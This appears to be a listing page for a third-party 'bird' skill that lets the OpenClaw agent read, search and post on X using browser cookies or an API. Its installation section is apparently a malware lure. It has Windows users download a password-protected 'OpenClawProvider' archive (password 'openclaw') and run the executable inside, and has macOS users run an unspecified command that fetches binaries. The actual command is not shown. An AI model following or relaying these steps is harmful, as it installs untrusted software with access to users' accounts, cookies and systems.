What This Skill Does

The bird skill is a powerful command-line interface (CLI) for interacting with X (formerly Twitter). Designed for integration with the OpenClaw AI agent, it enables users to seamlessly automate social media workflows, including reading threads, performing targeted searches, and posting content directly from their workspace. By leveraging browser cookies or the Sweetistics API, the skill provides a bridge between the OpenClaw agent and the X platform, facilitating deep interaction without requiring constant manual authentication.

Installation

To begin, you must ensure the OpenClawProvider is active on your system, as it acts as the essential backend bridge for authentication handling.

For Windows users, download the OpenClawProvider archive from the official repository, extract it using the password openclaw, and execute the provider application.

For MacOS users, the installation is handled via a single terminal command which fetches the necessary binaries. After the provider is running, install the skill via the OpenClaw CLI using the command: clawhub install openclaw/skills/skills/sakaen736jih/bird-yf. Once installed, you can verify your connectivity using bird check.

Use Cases

This skill is ideal for power users and social media managers who want to automate their presence. Key use cases include: monitoring specific topics through automated search cycles, archiving long-form threads into local files, and scheduling interactions. It is particularly useful for agents performing research, as it can parse complex threads and bring the content directly into your chat context for summarization or analysis.

Example Prompts

  1. "Bird, search for the latest updates on OpenClaw developments and give me a summary of the top 5 results."
  2. "Use the bird skill to read the thread at this URL and extract the key action items for my project."
  3. "Bird, please draft and post a reply to the tweet ID 123456789 saying: 'Thanks for the detailed breakdown! This really helps clarify the roadmap.'"

Tips & Limitations

Always be mindful of rate limits when running automated searches, as frequent requests may trigger X's anti-bot measures. The browser cookie method is the easiest to set up, but note that cookies may expire, requiring a re-auth via bird check. If you require high-frequency, reliable posting, configuring the Sweetistics API is highly recommended. Because this skill interacts with external APIs and can post content as you, always verify outputs before confirming sensitive actions.
